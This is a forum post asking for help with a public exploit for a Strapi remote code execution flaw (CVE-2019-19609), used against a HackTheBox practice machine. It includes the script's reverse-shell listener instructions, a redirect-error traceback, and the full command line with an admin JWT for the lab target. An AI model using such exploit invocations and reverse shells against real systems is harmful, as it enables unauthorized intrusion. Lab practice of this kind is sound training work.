Hi,
so I am using the exploit on a hackthebox machine. When executing the script, this is shown:
Strapi Framework Vulnerable to Remote Code Execution - CVE-2019-19609
please set up a listener on port 9001 before running the script. you will get a shell to that listener
Traceback (most recent call last):
File "/home/oceanhawk/CVE/CVE-2019-19609/exploit.py", line 30, in
response = requests.post(url, headers=headers, data=data, verify=False)
File "/usr/local/lib/python3.9/dist-packages/requests/api.py", line 119, in post
return request('post', url, data=data, json=json, **kwargs)
File "/usr/local/lib/python3.9/dist-packages/requests/api.py", line 61, in request
return session.request(method=method, url=url, **kwargs)
File "/usr/local/lib/python3.9/dist-packages/requests/sessions.py", line 530, in request
resp = self.send(prep, **send_kwargs)
File "/usr/local/lib/python3.9/dist-packages/requests/sessions.py", line 665, in send
history = [resp for resp in gen]
File "/usr/local/lib/python3.9/dist-packages/requests/sessions.py", line 665, in
history = [resp for resp in gen]
File "/usr/local/lib/python3.9/dist-packages/requests/sessions.py", line 166, in resolve_redirects
raise TooManyRedirects('Exceeded {} redirects.'.format(self.max_redirects), response=resp)
requests.exceptions.TooManyRedirects: Exceeded 30 redirects.
I get no shell to my listener on 9001.
The command I type is this:
python3 exploit.py api-prod.horizontal.htb lhost eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjM0NjUxMTc5LCJleHAiOjE2MzcyNDMxNzl9.h_EP9dFh_0qAIZU3lvl1SpVkkYlBY_nN45BGQ7ptIqw http://api-prod.horizontall.htb/